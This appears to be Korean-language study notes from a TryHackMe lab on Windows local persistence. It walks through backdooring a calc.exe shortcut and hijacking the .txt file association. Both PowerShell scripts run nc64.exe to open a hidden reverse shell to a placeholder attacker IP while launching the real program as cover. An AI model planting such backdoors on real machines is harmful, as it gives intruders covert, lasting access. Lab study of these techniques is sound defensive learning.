Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술
* 참고 : MITRE ATT&CK
TASK 3
3.1 Executable Files
바탕화면에 calc.exe 바로가기가 있다고 가정
1) PS 스크립트 만들기
# C:\Windows\System32\backdoor.ps1
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444"
C:\Windows\System32\calc.exe
2) 바탕화면에 있는 calc.exe 바로가기의 Target 변경
# target
# PowerShell 스크립트가 숨겨진 창에서 실행
powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1
3) 아이콘도 기존의 calc.exe로 변경
3.2 Hijacking File Associations
사용자가 특정 파일 형식을 열 때마다 운영 체제가 강제로 셸을 실행하도록 모든 파일 연결을 하이재킹할 수 있다.
파일 형식은 HKLM\Software\Classes\ 레지스트리에서 확인 가능하며, txt 파일을 타겟으로 실습해보자.
1) ProgID 찾기
.txt의 ProgID 는 txtfile이다.
2) ProgID에 해당하는 파일에 대해 실행될 명령 확인
HKLM\Software\Classes\{ProgID}\shell\open\command에서 해당 확장자를 가진 파일에 대해 실행될 기본 명령을 확인할 수 있다.
3) PS 스크립트 만들기
# C:\Windows\backdoor2.ps1.
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444"
C:\Windows\system32\NOTEPAD.EXE $args[0]
4) 기본명령 변경
powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor2.ps1'Play > THM' 카테고리의 다른 글
| Breaching Active Directory (1) (0) | 2023.09.27 |
|---|---|
| Windows Local Persistence (3) (0) | 2023.09.25 |
| Windows Local Persistence (1) (0) | 2023.09.25 |
| THM Offensive Pentesting - Gamezone (0) | 2023.07.20 |
| THM Offensive Pentesting - HackPack (0) | 2023.07.19 |
